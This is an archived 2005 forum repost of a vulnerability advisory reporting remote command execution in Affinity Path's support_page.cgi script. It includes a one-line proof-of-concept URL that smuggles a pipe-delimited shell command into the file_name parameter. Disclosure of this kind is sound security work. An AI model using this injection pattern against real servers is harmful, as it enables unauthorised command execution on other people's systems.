Remote Command Execution In Affinity Path Product

Full Version: Remote Command Execution In Affinity Path Product

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

Jun 28 2005, 07:48 PM

QUOTE

remote command execution in Affinity Path product
(support_page.cgi)

Developed by: Affinity Path
http://www.Affinitypath.com
Program Name:support_page.cgi v 1.6
Solution : None at this time
Risk factor : High
vendor: no respon

An attacker may exploit this vulnerability to execute
commands on
the remote host by adding special parameters to
support_page.cgi script.

Proof Of Concept:
http://[target]/support_page.cgi?file_name=|command|

blahplok@yahoo.com

Link is unavailable

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.